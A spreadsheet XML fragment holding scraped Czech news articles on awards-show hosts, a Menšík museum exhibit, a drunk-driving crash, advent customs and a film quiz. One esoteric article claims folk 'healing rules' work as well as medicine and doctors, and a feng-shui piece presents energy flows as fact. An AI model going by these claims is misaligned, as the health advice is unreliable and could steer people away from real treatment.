drsný humor a poznámky na adresu celebrit jsou už téměř tradicí. Loni si například nevybíravě rýpli do Jaromíra Soukupa slovy: „Navíc si představte, že prodáte půlku televize, abyste si mohli koupit dvě vstupenky do sálu.“ A to byl teprve trapas, který se vážně nehodil. A co se jim povedlo letos? Znovu nejapné vtipy o alkoholu , protože když přišla na řadu Monika Absolonová a její třetí místo, nezapomněl Aleš Háma dodat, že by lidé neměli dávat najevo to, že popíjí alkohol . I když TV Nova obhajuje jejich styl slovy, že jde v první řadě o zábavnou show , musím tedy nesouhlasit. Slavnostní předávání hudebních cen by mělo být především důstojnou událostí. Místo toho jsme svědky nevkusné exhibice dvou moderátorů, kteří si pletou prestižní galavečer s stand-up comedy. Je škoda, že tak významná hudební anketa, která má dlouholetou tradici, je rok co rok poznamenána podobnými excesy. Možná je čas na změnu moderátorů a návrat k důstojnější formě předávání cen. Navíc přidali jednu rýpavou poznámku pro ty, kteří je nemají rádi. „No pro ty z vás, kteří nás nemáte rádi, máme špatnou zprávu, budeme moderovat v únoru další show,“ řekl Aleš Háma . „No ale moje máma třeba bude mít radost,“ dodal Ondřej Sokol .</t>
  </si>
  <si>
    <t>20241201_225_3475103262_6686e60eb197e08c9a7c.html</t>
  </si>
  <si>
    <t>6686e60eb197e08c9a7c</t>
  </si>
  <si>
    <t>Světnička Vladimíra Menšíka v českolipském muzeu připomíná pohodu jeho letního sídla</t>
  </si>
  <si>
    <t>Shrnutí Světnička Vladimíra Menšíka v českolipském muzeu připomíná pohodu jeho letního sídla Na otázku, kdo byl Vladimír Menšík , asi každý odpoví herec, bavič, vypravěč. Známý je také jeho moravský původ, Ivančice proslavil jako nikdo jiný. Spojení slov Menšík a chalupář připomene většině seriál Chalupáři. Ovšem Vladimír Menšík byl i chalupářem ve smyslu majitel chalupy. Chalupa Menšíkových stojí na Českolipsku v Libereckém kraji . V roce 2005 ji rodina prodala novým majitelům, ale část jejího vybavení darovala českolipskému muzeu. „Když paní Menšíková prodávala chalupu, nabídla muzeu část vybavení. Muzeum to přivítalo a splnili jsme i její přání, aby tady byla památka na pana Menšíka ,“ přibližuje vznik světničky etnograf českolipského muzea a specialista na chalupy slavných na Českolipsku Marek Hofman. 11 fotografií A tak se návštěvníci mohou posadit za stůl na lavici či židli, na kterých sedával Vladimír Menšík . A rozjímat u skleničky a lahvinky vománkového vína a podívat se na malé rodinné video pořízené na chalupě. Muzejní světnička není velká prostorem, ale exponátů je v ní celá řada. Od malované skříně a truhly, sady keramického nádobí, obrazů či hodin přes houpací křeslo a harmonium až po legendární Menšíkův župan. Na stěnách samozřejmě nechybí připomínky jeho rolí. A spoustu zajímavých věcí se lze dozvědět z dokumentů na stole. Mimo jiné je tam vidět, jak Menšíkovic chalupa vypadala, když ji v roce 1965 pořídili za 3 000 Kčs a jak při jejím zvelebování sám mistr přiložil ruku k dílu. Návštěvníci se mohou posadit ke stolu, u kterého sedával Vladimír Menšík . A rozjímat u sklenky vománkového vína | foto: Jaroslav Hoření , Český rozhlas A pokud pak zatoužíte vidět přímo roubenou chalupu, kde chvíle volna s rodinou a přáteli trávil Vladimír Menšík , najdete ji na břehu řeky Ploučnice v Dolní Polici u Žandova , kam je možné se z České Lípy dostat třeba vlakem nebo autobusem. Je to jen 12 kilometrů. Expozice nazvaná „Na chalupě u Vladimíra Menšíka “ v přízemí hlavní budovy Vlastivědného muzea a galerie v České Lípě je přístupná celoročně od úterý do neděle a ve státní svátky od 9 do 17 hodin. Autor: Jaroslav Hoření Autor Jaroslav Hoření Rubrika transition_slide Výlety</t>
  </si>
  <si>
    <t>59270</t>
  </si>
  <si>
    <t>20241201_226_3475135430_8cce0511643f9bfe98fb.html</t>
  </si>
  <si>
    <t>8cce0511643f9bfe98fb</t>
  </si>
  <si>
    <t>Denní výběr: V Prostějově už září vánoční strom. Jmenuje se Hanáček</t>
  </si>
  <si>
    <t>20241201_227_3475135431_126d282286e9c7658a78.html</t>
  </si>
  <si>
    <t>126d282286e9c7658a78</t>
  </si>
  <si>
    <t>20241201_228_3475103267_66837a1a2abaeb826fe0.html</t>
  </si>
  <si>
    <t>66837a1a2abaeb826fe0</t>
  </si>
  <si>
    <t>Odborníci varují: Spíte nohama ke dveřím? Tato poloha postele vám může zbytečně škodit</t>
  </si>
  <si>
    <t>Odborníci varují: Spíte nohama ke dveřím? Tato poloha postele vám může zbytečně škodit feng-šuej, nábytek, postel, spánek Pro kvalitní spánek není důležité jen příjemné povlečení a pohodlná matrace, ale také umístění postele. To totiž může ovlivňovat naši psychickou pohodu, a dokonce způsobovat noční můry. To, jak dobře se v noci vyspíme, ovlivňuje celá řada faktorů. Snad každý ví, že by před ulehnutím do postele neměl jíst žádná tučná a těžká jídla, koukat se do mobilního telefonu, cvičit nebo pít alkohol . Už ale jen málokdo ví, že kvalitu našeho spánku snižuje i nesprávné umístění postele v ložnici. Ta by se nikdy neměla nacházet naproti dveřím. Proč tomu tak je? Odborníci mají jasnou odpověď. Mozek v pozoru „Podle f eng-šuej by měla být vaše postel v ložnici umístěna tak, abyste z ní viděli na dveře. Ne však tak, aby vaše nohy, když si do ní lehnete, přímo ke dveřím směřovaly,” uvedla pro magazín Tom’s Guide odbornice na spánek Claire Davies . „To, kde se nachází vaše postel, má obrovský vliv na hladinu stresu v těle, na spánek a také na to, do jaké míry můžete být během spánku rušeni. Pokud je vaše postel přímo naproti dveřím, budete celou noc v pozoru a neužijete si kvalitní a ničím nerušený spánek,” dodala ještě. Spaní naproti dveřím zkrátka vyvolává čekání na to, kdy se dveře otevřou a někdo do nich vstoupí. Není proto divu, že tento stres pak kolikrát způsobí i noční můry. Umístění postele naproti dveřím může vyvolávat negativní pocity FOTO Shutterstock Kam postel umístit? Když už víte, kde by postel rozhodně být neměla, nabízí se pochopitelně otázka, kam ji v ložnici přemístit, aby byl váš spánek co nejlepší a nejdelší. V každém případě platí, že by měla být postel co nejdále od dveří. To totiž vyvolává pocit bezpečí a také kontroly. Zkrátka máte i z peřin naprostý přehled o tom, co se kolem vás děje, a nemůže vás nic jen tak překvapit. Podle zastánců feng-šuej pak v kvalitě spánku hrají roli i světové strany. V žádném případě byste neměli spát tak, aby vaše hlava směřovala na jih či severovýchod. Právě z těchto stran totiž proudí negativní energie, která vás po celou noc bude udržovat v neklidu. Naopak je vhodné spát s hlavou na sever, východ, západ či jihovýchod. Z těsto stran proudí příjemná energie, která uklidňuje a zbavuje stresu a negativních myšlenek. Zároveň by měla být postel v ložnici umístěna tak, aby k ní byl přístup z obou stran. Neměla by tedy ani jednou stranou být těsně u zdi. Díky tomu kolem ní bude moci proudit energie. Pozor na další vybavení Aby se vám dobře spalo, je třeba tomu přizpůsobit nejen postel a její pozici, ale také samotnou ložnici. Vymalujte ji nějakými světlými barvami. Například béžově. Křiklavé barvy dráždí oči a stimulují mozek, jestliže tedy máte ložnici vymalovanou například sytě červenou barvou, snižujete tak kvalitu svého spánku. Zároveň by měla být ložnice čistá. Není třeba mít v ní spoustu různých kusů nábytku, dekorací nebo rostlin. I když se řada lidí ráda z postele dívá na televizi, ani ta by v ložnici neměla mít své místo. A nejen ta. Obecně je doporučováno zredukovat množství elektronických zařízení na minimum. Ložnice by měla být čistá a vzdušná FOTO Shutterstock Důsledky nekvalitního spánku Spánek má pochopitelně pro naše tělo nesmírně důležitou roli, a když jej máte nedostatek, projevuje se to různými způsoby. Tím nejcitelnějším je pochopitelně únava. S tou pak souvisí i snížená výkonnost v práci, podrážděnost, ale také zvýšená chuť na sladké. Když je tělo unavené, začne se dožadovat potravin s vysokým obsahem cukru. Ten mu totiž alespoň na chvíli nějakou energii dodá. Z dlouhodobého měřítka pak nekvalitní spánek vede až k problémům s obezitou, či dokonce k cukrovce a dalším vážným nemocem. V ideálním případě spěte alespoň 7–9 hodin. Se spánkem to ale na druhou stranu nepřehánějte. Jeho nadbytek totiž škodí stejně jako jeho nedostatek. Autor: Luboš Krátký Autor person Luboš Krátký</t>
  </si>
  <si>
    <t>72950</t>
  </si>
  <si>
    <t>7800</t>
  </si>
  <si>
    <t>20241201_229_3475084891_67ce7b329fe652ff72dc.html</t>
  </si>
  <si>
    <t>67ce7b329fe652ff72dc</t>
  </si>
  <si>
    <t>Zapomenuté příběhy významných osobností se vynořily ze zapomnění</t>
  </si>
  <si>
    <t>Zapomenuté příběhy významných osobností se vynořily ze zapomnění Světla světa se dočkala ke konci letošního roku kniha, která přináší formou osobních vzpomínek často i zapomenuté příběhy velikánů své doby. Slavnostní křest knihy proběhl 21. listopadu za účasti autorů, podporovatelů projektu a hostů. Knihu vydal Syndikát západočeských novinářů. Publikace Neobyčejné životy se zaměřuje na osobnosti, které ve své době dosáhly mimořádných výsledků, či jedinečných převratných vynálezů, ale přesto jsou jejich jména málo známá. Jedná se například o inženýra Palíka, konstruktéra škodováckých elektrických lokomotiv, profesora Topolčana, který je předním odborníkem na poli tumorových markerů nebo také o Ivo Hlaváčka , který patří k legendám plzeňského pivovarnictví. Kniha nezapomíná ani na osobnosti z oblasti sportu, například hokejistu Bednáře, fotbalového brankáře Františka Čalouna , atleta Jiřího Henžlíka, nechybí ani osobnosti z oblasti výtvarného umění, například výtvarník a designér lisovaného skla František Pečený , za filmovou produkci je možné jmenovat kameramana Milana Kazdu . Zaujme i příběh slavné léčitelky a bylinkářky z Volduch Josefy Muhlbacherové a čtenář v knize najde mnohá další jména a příběhy. Tým 17 autorů dokázal shromáždit a zpracovat celkem 27 příběhů těchto nadaných lidí „ Tato kniha je určena pro všechny, kteří chtějí lépe poznat kořeny svého kraje. Doufáme, že se bude všem dobře číst, ale také že vzbudí další zájem a diskusi o regionální historii. Je to dílo, které má ambice propojit minulost se současností a ukázat, že i zdánlivě zapomenuté příběhy mají velký význam a slouží jako inspirace pro naši novou mladou generaci, " řekl Zdeněk Levý, předseda Syndikátu západočeských novinářů. Kromě knihy Neobyčejné životy vypustil Syndikát západočeských novinářů a vydavatelství Delex Plzeň do světa ještě knihu s názvem Pivní rebelie. Čtvrtá kniha Jaroslava Pompa nabízí zajímavé příběhy malých řemeslných pivovarů v Plzeňském kraji , které proměnily pití piva v objevitelskou napínavou cestu pestrobarevnou pivní planetou. Kniha má ambici být užitečným průvodcem pro vyznavače trendového gastroturismu, u každého pivovaru přiblíží i místní turistické cíle a zajímavosti, pomůže objevitelům orientovat se v pivních stylech, které obohatily klasický český ležák. Přináší také silné poselství pivovarníků, nezanedbatelné v dnešní nervózní konfrontační době: ač jsou konkurenty, dokážou se přátelit, spolupracovat, fandit si. Pivo lidi sbližuje, to je zásadní apel knihy Pivní rebelie, která přibližuje kreativní práci sládků.</t>
  </si>
  <si>
    <t>49</t>
  </si>
  <si>
    <t>20241201_23_3479009593_8cf40fb89fddb48228a1.html</t>
  </si>
  <si>
    <t>8cf40fb89fddb48228a1</t>
  </si>
  <si>
    <t>Opilý mladík naboural škodovkou i do strážníků</t>
  </si>
  <si>
    <t>Opilý mladík naboural škodovkou i do strážníků 1. prosinec 2024 352 Co vedlo mladého muže k tomu, že ve tři hodiny ráno sedl za volant osobního auta a poblíž centra Prostějova naboural do služebního vozidla strážníků? To se zřejmě nedozvíme. Faktem ale je, že dvaadvacetiletý mladík jel autem bez toho, že by vlastnil řidičské oprávnění, a navíc opilý! „V pondělí 25. listopadu pár minut před třetí hodinou ranní nasedl dvaadvacetiletý mladík do vozidla Škoda Fabia a projížděl ulicemi Prostějova . V ulici Na Hrázi při jízdě směrem k Vodní ulici v mírné levotočivé zatáčce nepřizpůsobil zřejmě rychlost stavu a povaze vozovky, vyjel s vozidlem vpravo mimo komunikaci, kde projel živým plotem a narazil do betonového stavidla. Jeho počínání sledovala hlídka městské policie, která zastavila za havarovaným vozidlem. Řidič škodovky ale začal couvat a narazil do auta strážníků,“ popsala nevšední karambol Miluše Zajícová, tisková mluvčí Krajského ředitelství Policie ČR v Olomouci . U mladého řidiče byla provedena dechová zkouška, která odhalila, že řídil pod vlivem alkoholu . „Naměřené hodnoty se zastavily na 1,12 a 1,08 promile. Na výzvu hlídky se mladík podrobil vyšetření v nemocnici s odběrem bio materiálu. Policisté navíc zjistili, že řídí auto bez příslušného řidičského oprávnění. Celková hmotná škoda byla předběžně odhadnuta na 145 tisíc korun,“ dodala mluvčí krajské policie Miluše Zajícová. Anketa Večerníku Líbí se vám nový web Večerníku? Ano, líbí Autor: Michal Kadlec Autor Michal Kadlec</t>
  </si>
  <si>
    <t>20241201_230_3475083019_5bec96ab1bd8e128d9ea.html</t>
  </si>
  <si>
    <t>5bec96ab1bd8e128d9ea</t>
  </si>
  <si>
    <t>18 léčitelských pravidel, která nefungují o nic hůř než léky a lékaři</t>
  </si>
  <si>
    <t>18 léčitelských pravidel, která nefungují o nic hůř než léky a lékaři 1.12.2024 577 Podívejte se na osmnáct zlatých pravidel, která je třeba dodržovat. 1. Veďte klidné a nezatěžující rozhovor y s přáteli a svými blízkými. Rozprávějte s nimi s úsměvem a spokojenou myslí. Při takových rozmluvách dochází k vzájemné výměně energií, což normalizuje váš stav. 2. Večer poslouchejte klidnou relaxační hudbu, v průběhu dne hudbu radostnou a rytmickou. Tancovat a zpívat je povoleno! 3. Představujte si sebe sama už uzdraveného. Představte si například sebe za týden – jako zdravého, energického a smějícího se člověka někde venku, za jasného, slunečného dne. 4. Pijte po půllitru vody ráno, v poledne i večer. Pokaždé, když pijete, řekněte si: „Jsem zdravý/á, uzdravil/a jsem se!“ 5. Dělejte pravidelnou intenzivní rozcvičku – dřepy, kliky, cviky s lehkými činkami. Také běh je velmi užitečný, třeba i běh na místě. 6. Provádějte si masáž. Stačí masírovat suchou kůži rukama všude, kam dosáhnete. Zvláštní pozornost je třeba věnovat chodidlům, hrudníku, hlavě a krku a také oblasti nemocného orgánu. 7. Jezte málo, ale častěji – pětkrát až sedmkrát denně. Nejlepší ze všeho je doma připravené, co nejjednodušší jídlo a jídlo pocházející z čistých zdrojů. Cereálie, jogurty, tvaroh, kefír, čerstvá i nakládaná zelenina, domácí chléb, saláty atd. Vyhýbejte se nápojům zužujícím cévy, jako jsou čaj, káva a alkohol . 8. Spát choďte v deset večer. Vstávejte v 5 nebo v 6 ráno.Před usnutím si řekněte: „Vydávám se do země uzdravení, kde mi pomohou vrátit ztracené zdraví.“ Odpoledne si můžete krátce zdřímnout. 9. Meditujte. Dodržujte při tom následující postup:pohodlně se usaďte, ponořte se do stavu klidné, uvoněné mysli a v duchu si pět až deset minut opakujte: „ Ať jsou všichni zdraví, ať jsou všichni v pořádku.“ Zdůrazněme, že tyto myšlenky musejí být upřímné a od srdce. 10. Naučte se správně dýchat. Začněte vydechovat dvakrát až třikrát déle než nadechujete. Dýchejte pomaleji, rovnoměrně a volně, bez staženého hrdla a nahrbených ramenou. Kdykoli pocítíte únavu nebo zmatek, zaměřujte se na svůj dech a uveďte ho do rovnováhy. 11. Nemluvte ani nemyslete na svou nemoc. Vyžeňte myšlenky na ni z hlavy. Pokud se k ní v duchu přesto stále musíte vracet, zkuste nemyslet vůbec na nic, najděte si jiné téma k přemýšlení nebo si potichu prozpěvujte. 12. Sprchujte se studenou vodou. Prvních pár dní jenom chodidla, potom každý den o něco výš, až se začnete sprchovat celí včetně hlavy. Při této vodní proceduře myslete vždycky na svoje uzdravení. 13. Jeden den v týdnu držte hladovku. Vydržte celý den. Před každým takovým půstem si opakujte: „Ať mi tenhle půst přinese zdraví.“ 14. Zcela se odřízněte od kanálů, kterými by k vám mohla proniknout negativní informace. Myslete jenom na dobré věci. Nezabývejte se věcmi, které by vás přivedly do stavu sklíčenosti. 15.Jestliže máte tu možnost, buďte co nejčastěji v blízkosti přírody. Pokud takovou možnost nemáte, dívejte se alespoň z okna, na nebe a na oblaka. 16. Proste o pomoc Boha.. 17. Zlehka se nadechněte a zadržte dech (můžete si i prsty stisknout nos). Jakmile pocítíte první nutkání nadechnout se, opakujte si v duchu: „Chci žít!“. Potom se nadechněte. Vydýchejte se a celý postup opakujte. 18. Udělejte si seznam svých uzdravujících vět a čtěte si je každý den. Opakujte je často a mnohokrát. Například: „Uzdravuji se! Léčivá energie do mě vstoupila a léčí mé tělo. Jsem otevřen/a proudu léčivé energie. Moje játra (hlava, ledviny) se uzdravují.“ Nalaďte se na pozitivitu a uzdravujte se. Nikita Skorobogatov ========= Autor: AstroPlus.cz Rubrika transition_slide Esoterika</t>
  </si>
  <si>
    <t>411</t>
  </si>
  <si>
    <t>448</t>
  </si>
  <si>
    <t>20241201_231_3475082704_1e61267d7f3e7cde3bbc.html</t>
  </si>
  <si>
    <t>1e61267d7f3e7cde3bbc</t>
  </si>
  <si>
    <t>Přehled článků z rubrik</t>
  </si>
  <si>
    <t>20241201_232_3475083523_8da3f394613826a93f53.html</t>
  </si>
  <si>
    <t>8da3f394613826a93f53</t>
  </si>
  <si>
    <t>FOTO, VIDEO: Na Masarykově náměstí září strom. Ostravské Vánoce vypukly naplno</t>
  </si>
  <si>
    <t>FOTO, VIDEO: Na Masarykově náměstí září strom. Ostravské Vánoce vypukly naplno Úderem osmnácté hodiny se v sobotu 30. listopadu na ostravském Masarykově náměstí rozsvítil vánoční strom. Tradiční rozsvícení si nenechaly ujít tisíce lidí a na náměstí v podvečer nebylo k hnutí. Ostravany pozdravil ještě před rozsvícením vánočního stromu primátor města Jan Dohnal ( ODS ). Krátký program byl také připomenutím stého výročí Velké Ostravy , kdy se v roce 1924 spojilo sedm tehdy samostatných obcí v jednu Velkou Ostravu . Ještě v sobotu večer vystoupil na hlavním pódiu na Masarykově náměstí Jaroslav Uhlíř s kapelou. Spolu s rozsvícením stromu začalo fungovat na nedalekém náměstí Dr. E. Beneše také Vánoční kluziště. Program nyní bude na Masarykově náměstí v rámci Ostravských Vánoc téměř každý den až do 23. prosince. Lidé tak uvidí a uslyší například Davida Kollera , Davida Krause , Ondřeje Rumla nebo domácí Buty, kteří celý program Ostravských Vánoc zakončí. Vánoční kluziště bude v provozu až do 31. ledna, bruslení na něm je zdarma. Kromě kulturního programu je letos na Masarykově náměstí téměř 50 stánků, kde se kromě obligátní nabídky typu svařeného vína nebo bramborových placek nabízejí také řemeslné výrobky i keramika. Ostravské Vánoce se odehrávají rovněž na dalších místech v centru města. Na sousedním Jiráskově náměstí je připravena dětská scéna, svoji scénu má i Prokešovo náměstí před Novou radnicí, stejně jako náměstí Dr. E. Beneše. Autor: Jan Král Autor person Jan Král</t>
  </si>
  <si>
    <t>20241201_233_3475092432_f28df053db442355fe9e.html</t>
  </si>
  <si>
    <t>f28df053db442355fe9e</t>
  </si>
  <si>
    <t>Adventní čas: Cesta ke klidným Vánocům dlouhá přes tisíc let</t>
  </si>
  <si>
    <t>Adventní čas: Cesta ke klidným Vánocům dlouhá přes tisíc let Dnes začíná advent, čas plný očekávání a příprav na Vánoce. Připomeňme si, co toto období znamená a jaké tradice ho provázejí. Advent není jen o shonu a nákupech, ale především o zklidnění, radosti a sdílení. Jeho čtyři týdny představují cestu k Vánocům, která nám může přinést mnohem víc než jen dokonale připravený sváteční stůl – může nám pomoci objevit pravou podstatu sváteční pohody. Advent, odvozený z latinského slova „adventus“ znamenajícího „příchod“, je období duchovní přípravy na Vánoce v křesťanském kalendáři. Jeho kořeny sahají do 4. století, kdy sloužil jako doba přípravy na křest. První zmínky o adventu pocházejí ze 4. století z jižní Galie a Španělska , kde měl charakter postního období podobného přípravám na Velikonoce. V těchto oblastech byl zaměřen na duchovní ztišení a přípravu na křest. V Římě byl advent v 6. století liturgicky upraven a začal připomínat blížící se oslavu Kristova narození, ovšem bez asketického zaměření. Na čtyři týdny se adventní období ustálilo až za papeže Řehoře Velikého . Jedním z hlavních symbolů adventu je adventní věnec. Jeho tradice sahá do 19. století, kdy německý pastor Johann Hinrich Wichern v roce 1839 vytvořil první věnec v Hamburku . Věnec měl 24 svíček, které dětem pomáhaly odpočítávat dny do Vánoc, a čtyři větší svíčky označovaly adventní neděle. První adventní neděle: Železná naděje Symbolizuje naději. V kostelech se během bohoslužeb čtou texty z Písma, které vyjadřují naději na Spasitelův příchod. V domácnostech se zapaluje první ze čtyř svíček na adventním věnci, často fialová, což je barva pokání a očekávání. Tradicí je zapalovat svíčky proti směru hodinových ručiček. Adventní věnec se čtyřmi svíčkami je tradičním symbolem předvánočního období. Tradičně se používají tři fialové a jedna růžová svíčka. (Envato) Druhá adventní neděle: Bronzový mír Znamená příchod míru. Zapaluje se druhá svíčka na věnci, opět fialová, a často se v kostelech čtou texty o prorokování Kristova narození. V českém prostředí se během adventu často konají roráty, což jsou ranní adventní mše, které jsou oblíbené především mezi děmi, protože po mši dostávají cukroví nebo jiné malé dárky. Je to vhodná příležitost začít péct první cukroví a vyzkoušet tradiční recepty, které potěší rodinu i přátele. Třetí adventní neděle: Stříbrné přátelství Tato neděle, známá také jako Růžová neděle, je nedělí radosti. Zapaluje se růžová svíčka na adventním věnci, což znamená, že Vánoce jsou blízko. Tradice zahrnuje také stavění betlémů, které připomínají narození Ježíše. Je to skvělý čas na setkání s přáteli a společné chvíle u horkého čaje či svařeného vína . Stříbrná neděle také bývá dnem, kdy se ladí poslední detaily vánočních příprav. Čtvrtá adventní neděle: Zlatá láska Symbol lásky. Zapaluje se poslední fialová svíčka a přípravy na Vánoce vrcholí. V českých rodinách se zvykne zdobit vánoční stromeček, peče se vánočka a připravují se ostatní vánoční speciality. Je to poslední přípravná fáze před vánočními svátky, které začínají Štědrým dnem 24. prosince a ujištění, že Vánoce budou skutečně svátečním časem klidu a radosti. Epoch Times Adventní kalendáře Adventní kalendáře, jak je známe dnes, mají své kořeny v 19. století. První zmínky o adventním čekání na Vánoce pocházejí z německých luteránských komunit, kde rodiče dávali svým dětem každý den během adventu malý dárek nebo obrázek. V roce 1908 byl v Mnichově vytvořen první tištěný adventní kalendář, který obsahoval 24 malých dvířek, za nimiž byly schovány náboženské obrázky nebo verše. Tento koncept se rychle rozšířil a během 20. století se adventní kalendáře staly populární po celé Evropě . Po druhé světové válce se začaly kalendáře plnit nejen obrázky, ale i malými sladkostmi nebo hračkami, což ještě zvýšilo jejich oblibu. V 50. letech 20. století se adventní kalendáře začaly objevovat i v anglicky mluvících zemích, kde se staly nedílnou součástí vánoční tradice. Dnes je možné najít adventní kalendáře s nejrůznějšími tématy, od klasických náboženských motivů až po moderní varianty se značkovým kosmetickým příslušenstvím nebo miniaturními lahvičkami alkoholu . Zajímavým milníkem v historii adventních kalendářů je rok 2007, kdy se objevil první interaktivní online adventní kalendář, který otevřel cestu k digitálním verzím těchto tradičních symbolů vánočního očekávání. Současné adventní kalendáře tak nejsou jen fyzické předměty, ale mohou být i virtuální, nabízející každý den nové digitální překvapení. Ručně vyrobený vánoční adventní kalendář. Adventní kalendáře mají dnes mnoho podob a většina se kupuje v obchodech. Domácí adventní kalendář může skrývat mnohá překvapení a je tak zábavou pro celou rodinu. (Shaiith / Envato) Adventní tradice pro každý den Kromě kalendářů, které pomáhají odpočítávat dny do Vánoc, jsou zde i specifické svátky, které obohacují adventní období: Barborka (4. prosince) – Svátek svaté Barbory, spojený s věštbami a zvyky, jako je házení větví do vody, symbolizuje zejména naději. V minulosti byl připomínkou, že po zimě přijde opět jaro. Vykvetení větviček znamená štěstí. Mikuláš (6. prosince) – Svátek svatého Mikuláše, kde děti dostávají dárky, ovoce nebo cukroví do připravených bot nebo střevíců. Je to uchovatel tradic a zdroj ponaučení pro většinu dětí. Lucie (13. prosince) – Den světla a lásky, kdy se prováděly zvyky pro vyvolání snů o budoucím manželovi nebo pro štěstí. Adventní období vyvrcholí Vánočními svátky, které následují těsně poté. Dále si do konce roku připomeneme: Štěpána (26. prosince) – Druhý sváteční den, kdy se lidé často potkávají s rodinou nebo jdou na procházku. A konečně, Silvestr (31. prosince) uzavírá adventní a vánoční období s oslavami příchodu nového roku. Vánoční čas je tedy nejen tradičním očekáváním příchodu Spasitele, ale i oslavou tradic, rodinných setkání a radosti z malých každodenních překvapení, které nám přináší adventní kalendáře a svátky, jež nás připravují na kouzelné Vánoce. Ať už se rozhodnete dodržovat staré tradice, nebo vytvořit své vlastní, nejdůležitější je užít si tento čas bez spěchu a stresu. Zapalte svíčky, naslouchejte koledám a nechte se unášet atmosférou přicházejících Vánoc. Autor: Kateřina K. Rubrika transition_slide Inspirace</t>
  </si>
  <si>
    <t>20241201_234_3808471014_f99080da8975ba5a88df.html</t>
  </si>
  <si>
    <t>f99080da8975ba5a88df</t>
  </si>
  <si>
    <t>Kvíz: Jak moc dobře znáte hlášky, filmy a role Ivy Janžurové?</t>
  </si>
  <si>
    <t>Kvíz: Jak moc dobře znáte hlášky, filmy a role Ivy Janžurové ? Kvízy Foto: Filmové studio Barrandov Legendární Iva Janžurová je jednou z nejznámějších a nejvýznamnějších českých hereček, kterou můžeme vídat na televizních obrazovkách od 60. let. Za tu dobu ztvárnila nespočet rolí ve filmech i seriálech. Pojďte si prověřit své znalosti z filmů, ve kterých hrála. Zkuste si náš kvíz! Herečka Iva Janžurová , která letos oslaví 84. narozeniny, se narodila v Žirovnici u Pelhřimova . Její rodiče byli učitelé, a tak sama nastoupila na pedagogické gymnázium. Láska k divadlu ovšem byla silnější, proto pokračovala na DAMU. U talentových zkoušek zprvu neuspěla kvůli nedostatku temperamentu, ale o chvíli později šla naštvaná pomoct s dialogem jiné uchazečce a komisi oslovila tak, že ji přijali. To bylo štěstí pro českou kinematografii, jelikož už v roce 1960 se proslavila rolemi v dramatu Kočár do Vídně , které má na Kinoboxu hodnocení 76 %, a komediích Svatba jako řemen (81 %) či Světáci (85 %). Pak už se role jen hrnuly a my jí díky tomu známe z nespočet komediálních snímků. I když sama o sobě tvrdí, že vůbec nemá smysl pro humor. Foto: Cinemart Za bohatou filmovou kariéru byla i náležitě oceňována. Iva Janžurová je dvojnásobnou držitelkou Českého lva. Byla nominovaná na ceny na filmovém festivalu v Cannes . V roce 2015 získala na Mezinárodním filmovém festivalu v Karlových Varech Křišťálový glóbus za celoživotní přínos kinematografii. Víc už ale neprozradíme, abyste to neměli úplně jednoduché. Pojďme na to, vyzkoušejte si náš filmový kvíz s Ivou Janžurovou . Kvíz: Jak moc dobře znáte hlášky, filmy a role Ivy Janžurové ? Vyzkoušejte si znalosti z filmů legendární Ivy Janžurové ! 1 / 14 Z jakého filmu pochází tato hláška s Ivou Janžurovou : Vy nekouříte? Ne, já když kouřím, tak zvracím.? Pane, vy jste vdova Zítra to roztočíme, drahoušku...! 2 / 14 Legendární hádka mezi Ivou Janžurovou a Františkem Peterkou ve filmu „Hodíme se k sobě, miláčku?" vznikla kvůli barvě. Jaké? Jestli je barva oranžová, nebo lososová Jestli je barva modrá, nebo tyrkysová Jestli je barva zelená, nebo zelenkavá 3 / 14 V jakém filmu Václava Vorlíčka ztvárnila Iva Janžurová trojroli? Pane, vy jste vdova Co je doma, to se počítá, pánové... Drahé tety a já 4 / 14 Ve kterém filmu zazněla legendární konverzace: Sedni si. Já sedím. Ona sedí. Ty sedíš? My taky sedíme. Světáci Ve které pohádce ztvárnila bábu Magi? Ďábelské líbánky Jak se mele babí hněv Strach má velké oči Jak se jmenuje film Alice Nellis , kde si Iva Janžurová zahrála se svými dcerami? A máte nás, holky, v hrsti Výlet Jak se jmenuje film, kde jako paní Bartáčková válčí se sousedy, rodinou Nováků? Zítra to roztočíme, drahoušku...! Jakou postavu hrála Iva Janžurová v komedii Páni kluci? Blanku Kdo hrál Ivě Janžurové dceru ve filmu Ten svetr si nesvlíkej? Zuzana Bydžovská Jak se jmenuje film z fotografie, ve kterém hrála? Bouřlivé víno Čím se živila postava Ivy Janžurové , než šla do důchodu, ve filmu Teroristka? Sekretářka Jak se jmenuje film z fotografie, ve kterém hrála? Zítra to roztočíme, drahoušku...! Což takhle dát si špenát Nevěsta na útěku Jak se jmenuje film, který byl o ní v roce 2024 natočen? Bouřlivé víno Holubník 14 / 14 V jakém filmu si zahrála studentku večerní školy Evu Týfovou, která dostala od spolužáka psaní se vzkazem „Sejdeme se na hřbitově“? Marečku, podejte mi pero! Já to tedy beru, šéfe...! Vaše skóre je Průměrné skóre je 0% 0% Přihlaste se do našeho newsletteru a buďte vždy v obraze: Diskuze Autor: Karolína Oehmová Autor person Karolína Oehmová</t>
  </si>
  <si>
    <t>39120</t>
  </si>
  <si>
    <t>22930</t>
  </si>
  <si>
    <t>20241201_235_3475082697_b4b2bcf8c28ac3a9d786.html</t>
  </si>
  <si>
    <t>b4b2bcf8c28ac3a9d786</t>
  </si>
  <si>
    <t>Denní výběr: Nechutné urážky. Drsný útok na Dahla, kouč českých házenkářek terčem nenávisti</t>
  </si>
  <si>
    <t>20241201_236_3475082366_80a4a9fec28a6c16b506.html</t>
  </si>
  <si>
    <t>80a4a9fec28a6c16b506</t>
  </si>
  <si>
    <t>Denní výběr: Muž na Klatovsku vypadl z okna, do nemocnice ho vezl vrtulník</t>
  </si>
  <si>
    <t>20241201_237_3531087339_a8681b19d29b7d247007.html</t>
  </si>
  <si>
    <t>a8681b19d29b7d247007</t>
  </si>
  <si>
    <t>Víno Rulandské modré 2022, moravské zemské víno, Vinařství Turoňovi</t>
  </si>
  <si>
